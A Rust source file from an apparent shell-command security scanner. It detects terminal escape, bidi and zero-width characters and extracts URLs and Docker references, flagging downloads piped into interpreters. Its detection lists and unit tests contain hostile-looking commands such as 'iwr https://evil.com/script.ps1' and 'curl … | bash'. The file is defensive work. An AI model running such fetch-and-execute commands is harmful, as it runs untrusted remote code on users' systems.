1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Selects which tier-1 pattern set [`tier1_scan`] applies to its input.
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub enum ScanContext {
    /// Match the input against the generated exec pattern.
    Exec,
    /// Match the input against the generated paste pattern.
    Paste,
}
15
16#[allow(dead_code)]
18mod tier1_generated {
19 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22pub fn extractor_ids() -> &'static [&'static str] {
24 tier1_generated::EXTRACTOR_IDS
25}
26
27static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39 Regex::new(
40 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41 )
42 .expect("url regex must compile")
43});
44
/// Summary of a [`scan_bytes`] pass over raw input.
///
/// Each flag records whether at least one finding of that category was seen;
/// `details` lists the individual findings in the order they were found.
/// `Default` yields the "nothing found" result.
#[derive(Debug, Clone, Default, PartialEq, Eq)]
pub struct ByteScanResult {
    /// An ESC (0x1b) byte belonging to an escape sequence was found.
    pub has_ansi_escapes: bool,
    /// A control byte (below 0x20 other than `\n`, `\t` and ESC, or DEL 0x7f)
    /// was found.
    pub has_control_chars: bool,
    /// A character accepted by `is_bidi_control` was found.
    pub has_bidi_controls: bool,
    /// A character accepted by `is_zero_width` was found.
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// One entry per individual finding.
    pub details: Vec<ByteFinding>,
}

/// A single suspicious byte (or multi-byte character) located by [`scan_bytes`].
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ByteFinding {
    /// Byte offset into the scanned input where the finding starts.
    pub offset: usize,
    /// The byte at `offset`; for a multi-byte character this is its lead byte.
    pub byte: u8,
    /// Human-readable description of what was found.
    pub description: String,
}
60
61pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63 match context {
64 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66 }
67}
68
69pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71 let mut result = ByteScanResult {
72 has_ansi_escapes: false,
73 has_control_chars: false,
74 has_bidi_controls: false,
75 has_zero_width: false,
76 has_invalid_utf8: false,
77 details: Vec::new(),
78 };
79
80 if std::str::from_utf8(input).is_err() {
82 result.has_invalid_utf8 = true;
83 }
84
85 let len = input.len();
86 let mut i = 0;
87 while i < len {
88 let b = input[i];
89
90 if b == 0x1b {
92 if i + 1 < len {
93 let next = input[i + 1];
94 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95 result.has_ansi_escapes = true;
96 result.details.push(ByteFinding {
97 offset: i,
98 byte: b,
99 description: match next {
100 b'[' => "CSI escape sequence",
101 b']' => "OSC escape sequence",
102 b'_' => "APC escape sequence",
103 b'P' => "DCS escape sequence",
104 _ => "escape sequence",
105 }
106 .to_string(),
107 });
108 i += 2;
109 continue;
110 }
111 } else {
112 result.has_ansi_escapes = true;
114 result.details.push(ByteFinding {
115 offset: i,
116 byte: b,
117 description: "trailing escape byte".to_string(),
118 });
119 }
120 }
121
122 if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124 result.has_control_chars = true;
125 result.details.push(ByteFinding {
126 offset: i,
127 byte: b,
128 description: format!("control character 0x{b:02x}"),
129 });
130 }
131
132 if b == 0x7F {
134 result.has_control_chars = true;
135 result.details.push(ByteFinding {
136 offset: i,
137 byte: b,
138 description: "control character 0x7f (DEL)".to_string(),
139 });
140 }
141
142 if b >= 0xc0 {
144 let remaining = &input[i..];
146 if let Some(ch) = std::str::from_utf8(remaining)
147 .ok()
148 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149 .and_then(|s| s.chars().next())
150 {
151 if is_bidi_control(ch) {
153 result.has_bidi_controls = true;
154 result.details.push(ByteFinding {
155 offset: i,
156 byte: b,
157 description: format!("bidi control U+{:04X}", ch as u32),
158 });
159 }
160 if is_zero_width(ch) {
162 result.has_zero_width = true;
163 result.details.push(ByteFinding {
164 offset: i,
165 byte: b,
166 description: format!("zero-width character U+{:04X}", ch as u32),
167 });
168 }
169 i += ch.len_utf8();
170 continue;
171 }
172 }
173
174 i += 1;
175 }
176
177 result
178}
179
/// Returns `true` if `ch` is a Unicode bidirectional formatting control.
///
/// Covers the code points with the Unicode `Bidi_Control` property:
/// * U+061C ARABIC LETTER MARK,
/// * U+200E / U+200F (LRM, RLM),
/// * U+202A..=U+202E (LRE, RLE, PDF, LRO, RLO),
/// * U+2066..=U+2069 (LRI, RLI, FSI, PDI).
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{061C}'
            | '\u{200E}'..='\u{200F}'
            | '\u{202A}'..='\u{202E}'
            | '\u{2066}'..='\u{2069}'
    )
}
197
/// Returns `true` if `ch` is one of the zero-width characters this scanner
/// tracks: U+200B, U+200C, U+200D or U+FEFF.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 4] = ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}'];
    ZERO_WIDTH.contains(&ch)
}
208
209pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212 let segments = tokenize::tokenize(input, shell);
213 let mut results = Vec::new();
214
215 for (seg_idx, segment) in segments.iter().enumerate() {
216 for mat in URL_REGEX.find_iter(&segment.raw) {
218 let raw = mat.as_str().to_string();
219 let url = parse::parse_url(&raw);
220 results.push(ExtractedUrl {
221 raw,
222 parsed: url,
223 segment_index: seg_idx,
224 in_sink_context: is_sink_context(segment, &segments),
225 });
226 }
227
228 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231 let cmd_lower = cmd.to_lowercase();
232 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233 });
234 if is_sink_context(segment, &segments) && !is_docker_cmd {
235 for arg in &segment.args {
236 let clean = strip_quotes(arg);
237 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238 results.push(ExtractedUrl {
239 raw: clean.clone(),
240 parsed: UrlLike::SchemelessHostPath {
241 host: extract_host_from_schemeless(&clean),
242 path: extract_path_from_schemeless(&clean),
243 },
244 segment_index: seg_idx,
245 in_sink_context: true,
246 });
247 }
248 }
249 }
250
251 if let Some(cmd) = &segment.command {
253 let cmd_lower = cmd.to_lowercase();
254 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255 if let Some(docker_subcmd) = segment.args.first() {
256 let subcmd_lower = docker_subcmd.to_lowercase();
257 if subcmd_lower == "build" {
258 let mut i = 1;
260 while i < segment.args.len() {
261 let arg = strip_quotes(&segment.args[i]);
262 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263 let tag_val = strip_quotes(&segment.args[i + 1]);
264 if !tag_val.is_empty() {
265 let docker_url = parse::parse_docker_ref(&tag_val);
266 results.push(ExtractedUrl {
267 raw: tag_val,
268 parsed: docker_url,
269 segment_index: seg_idx,
270 in_sink_context: true,
271 });
272 }
273 i += 2;
274 } else if arg.starts_with("-t") && arg.len() > 2 {
275 let tag_val = strip_quotes(&arg[2..]);
276 let docker_url = parse::parse_docker_ref(&tag_val);
277 results.push(ExtractedUrl {
278 raw: tag_val,
279 parsed: docker_url,
280 segment_index: seg_idx,
281 in_sink_context: true,
282 });
283 i += 1;
284 } else if let Some(val) = arg.strip_prefix("--tag=") {
285 let tag_val = strip_quotes(val);
286 let docker_url = parse::parse_docker_ref(&tag_val);
287 results.push(ExtractedUrl {
288 raw: tag_val,
289 parsed: docker_url,
290 segment_index: seg_idx,
291 in_sink_context: true,
292 });
293 i += 1;
294 } else {
295 i += 1;
296 }
297 }
298 } else if subcmd_lower == "image" {
299 if let Some(image_subcmd) = segment.args.get(1) {
301 let image_subcmd_lower = image_subcmd.to_lowercase();
302 if matches!(
303 image_subcmd_lower.as_str(),
304 "pull" | "push" | "inspect" | "rm" | "tag"
305 ) {
306 extract_first_docker_image(
307 &segment.args[2..],
308 seg_idx,
309 &mut results,
310 );
311 }
312 }
313 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316 }
317 }
318 }
319 }
320 }
321
322 results
323}
324
325#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328 pub raw: String,
329 pub parsed: UrlLike,
330 pub segment_index: usize,
331 pub in_sink_context: bool,
332}
333
/// Container-CLI flags that consume the following argument as their value.
///
/// `extract_first_docker_image` skips the argument after any of these, so a
/// flag value is never mistaken for the image name (for example the `web` in
/// `docker run --name web nginx`). Matching is exact and case-sensitive.
///
/// Only flags that take a value in every subcommand handled here are listed.
/// Short flags that are boolean for some subcommands (`-a`, `-q`, `-h`, ...)
/// are deliberately left out.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    // Common `run` / `create` options that take a value.
    "--name",
    "-e",
    "--env",
    "--env-file",
    "-v",
    "--volume",
    "--volumes-from",
    "--mount",
    "--tmpfs",
    "-p",
    "--publish",
    "--expose",
    "--network",
    "--net",
    "--ip",
    "--dns",
    "--add-host",
    "--link",
    "--hostname",
    "-w",
    "--workdir",
    "-u",
    "--user",
    "--entrypoint",
    "-m",
    "--memory",
    "--cpus",
    "--shm-size",
    "--ulimit",
    "--restart",
    "--pull",
    "--runtime",
    "--gpus",
    "--device",
    "--cap-add",
    "--cap-drop",
    "--security-opt",
    "--log-driver",
    "--log-opt",
    "--cidfile",
];
336
337fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
339 let mut skip_next = false;
340 for arg in args {
341 if skip_next {
342 skip_next = false;
343 continue;
344 }
345 let clean = strip_quotes(arg);
346 if clean == "--" {
347 break;
348 }
349 if clean.starts_with("--") && clean.contains('=') {
350 continue; }
352 if clean.starts_with('-') {
353 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
354 skip_next = true;
355 }
356 continue;
357 }
358 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
359 let docker_url = parse::parse_docker_ref(&clean);
360 results.push(ExtractedUrl {
361 raw: clean,
362 parsed: docker_url,
363 segment_index: seg_idx,
364 in_sink_context: true,
365 });
366 }
367 break; }
369}
370
371fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
373 if let Some(cmd) = &segment.command {
374 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
375 let cmd_lower = cmd_base.to_lowercase();
376 if is_source_command(&cmd_lower) {
377 return true;
378 }
379 }
380
381 if let Some(sep) = &segment.preceding_separator {
383 if sep == "|" || sep == "|&" {
384 if let Some(cmd) = &segment.command {
386 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
387 if is_interpreter(cmd_base) {
388 return true;
389 }
390 }
391 }
392 }
393
394 false
395}
396
/// Returns `true` if `cmd` is one of the commands this module treats as a
/// source command.
///
/// The comparison is exact, so callers must pass a lowercased basename.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "fetch",
        "scp",
        "rsync",
        "git",
        "ssh",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.iter().any(|known| *known == cmd)
}
424
/// Returns `true` if `cmd` is one of the shells or script interpreters this
/// module recognises.
///
/// The comparison is exact and case-sensitive.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.iter().any(|known| *known == cmd)
}
442
/// Trims surrounding whitespace from `s` and then removes one pair of matching
/// outer quotes (`"…"` or `'…'`) if present.
///
/// A lone quote character, or mismatched opening and closing quotes, are left
/// untouched.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    ['"', '\'']
        .iter()
        .find_map(|&quote| trimmed.strip_prefix(quote)?.strip_suffix(quote))
        .unwrap_or(trimmed)
        .to_string()
}
453
/// Heuristically decides whether `s` is a scheme-less `host[/path]` reference
/// such as `example.com/install.sh` or `bit.ly/abc`.
///
/// The part before the first `/` is treated as the host and must:
/// * not begin with `-` (that is a flag);
/// * contain a dot and no spaces;
/// * not end in a well-known file extension (so `install.sh` is a file);
/// * consist solely of non-empty dot-separated labels, which rules out
///   dotfiles and relative paths such as `.bashrc`, `.config/x` or `a..b`;
/// * end in a label of 2–63 ASCII letters, taken to be the TLD.
fn looks_like_schemeless_host(s: &str) -> bool {
    // Names ending in one of these are assumed to be local files, not hosts.
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz",
        ".zip", ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so",
        ".log", ".conf", ".cfg", ".ini", ".toml",
    ];

    if s.starts_with('-') {
        return false;
    }

    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }

    let host_lower = host_part.to_lowercase();
    if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
        return false;
    }

    // A hostname cannot contain empty labels. Remember the last label as the
    // candidate TLD while checking.
    let mut tld = "";
    for label in host_part.split('.') {
        if label.is_empty() {
            return false;
        }
        tld = label;
    }

    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
485
/// Returns the host portion of a scheme-less reference: everything before the
/// first `/`, or the whole string when there is no `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    let host = match s.find('/') {
        Some(slash) => &s[..slash],
        None => s,
    };
    host.to_string()
}
489
/// Returns the path portion of a scheme-less reference: everything from the
/// first `/` onwards (slash included), or an empty string when there is no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map(|slash| s[slash..].to_string())
        .unwrap_or_default()
}
497
#[cfg(test)]
mod tests {
    use super::*;

    /// Does the exec-context tier-1 pattern fire on `input`?
    fn exec_hit(input: &str) -> bool {
        tier1_scan(input, ScanContext::Exec)
    }

    /// Does the paste-context tier-1 pattern fire on `input`?
    fn paste_hit(input: &str) -> bool {
        tier1_scan(input, ScanContext::Paste)
    }

    /// Number of entries extracted from `command` that parsed as Docker refs.
    fn docker_ref_count(command: &str) -> usize {
        extract_urls(command, ShellType::Posix)
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .count()
    }

    // --- tier-1 regex, exec context -------------------------------------

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(exec_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!exec_hit("ls -la"));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!exec_hit("echo hello world"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(exec_hit("something | bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(exec_hit("something | sudo bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(exec_hit("something | env bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(exec_hit("something | /bin/bash"));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(exec_hit("git clone git@github.com:user/repo"));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(exec_hit("curl https://xn--example-cua.com"));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(exec_hit("docker pull malicious/image"));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(exec_hit("iwr https://evil.com/script.ps1"));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(exec_hit("curl https://example.com/install.sh"));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(exec_hit("open file.zip"));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(exec_hit("curl bit.ly/abc"));
    }

    // --- tier-1 regex, paste context ------------------------------------

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(paste_hit("café"));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(paste_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        assert!(!exec_hit("echo café"));
    }

    // --- byte scanning ---------------------------------------------------

    #[test]
    fn test_byte_scan_ansi() {
        assert!(scan_bytes(b"hello \x1b[31mred\x1b[0m world").has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        assert!(scan_bytes(b"hello\rworld").has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        assert!(scan_bytes("hello\u{202E}dlrow".as_bytes()).has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        assert!(scan_bytes("hel\u{200B}lo".as_bytes()).has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let outcome = scan_bytes(b"hello world\n");
        assert!(!outcome.has_ansi_escapes);
        assert!(!outcome.has_control_chars);
        assert!(!outcome.has_bidi_controls);
        assert!(!outcome.has_zero_width);
    }

    // --- URL extraction --------------------------------------------------

    #[test]
    fn test_extract_urls_basic() {
        let found = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(found.len(), 1);
        assert_eq!(found[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let found = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!found.is_empty());
        assert!(found[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let found = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!found.is_empty());
        assert!(matches!(found[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        assert_eq!(docker_ref_count("docker pull nginx"), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let found = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!found.is_empty());
    }

    // --- helpers ---------------------------------------------------------

    #[test]
    fn test_strip_quotes_single_char() {
        // A lone quote has no partner to pair with and must survive intact.
        for lone in ["\"", "'"].iter() {
            assert_eq!(strip_quotes(lone), *lone);
        }
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL, VT, FF and DEL, in that order.
        let cases: [&[u8]; 4] = [
            b"hello\x07world",
            b"hello\x0Bworld",
            b"hello\x0Cworld",
            b"hello\x7Fworld",
        ];
        for input in cases.iter() {
            assert!(scan_bytes(input).has_control_chars);
        }
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC, APC and DCS introducers, in that order.
        let cases: [&[u8]; 3] = [
            b"hello\x1b]0;title\x07world",
            b"hello\x1b_dataworld",
            b"hello\x1bPdataworld",
        ];
        for input in cases.iter() {
            assert!(scan_bytes(input).has_ansi_escapes);
        }
    }

    #[test]
    fn test_schemeless_long_tld() {
        for host in ["example.academy", "example.photography"].iter() {
            assert!(looks_like_schemeless_host(host));
        }
    }

    #[test]
    fn test_segment_index_correct() {
        let found = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        // Two segments were tokenized, so every index must be 0 or 1.
        assert!(found.iter().all(|u| u.segment_index <= 1));
    }

    #[test]
    fn test_docker_build_context_not_image() {
        assert_eq!(
            docker_ref_count("docker build ."),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        assert_eq!(docker_ref_count("docker image pull nginx"), 1);
    }

    // --- generated tier-1 data -------------------------------------------

    #[test]
    fn test_tier1_module_boundary_enforcement() {
        assert!(
            !tier1_generated::EXTRACTOR_IDS.is_empty(),
            "EXTRACTOR_IDS must not be empty"
        );

        let exec_fragments = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_fragments = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_fragments > 0, "Must have exec fragments");
        assert!(
            paste_fragments >= exec_fragments,
            "Paste fragments must be superset of exec fragments"
        );

        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }
}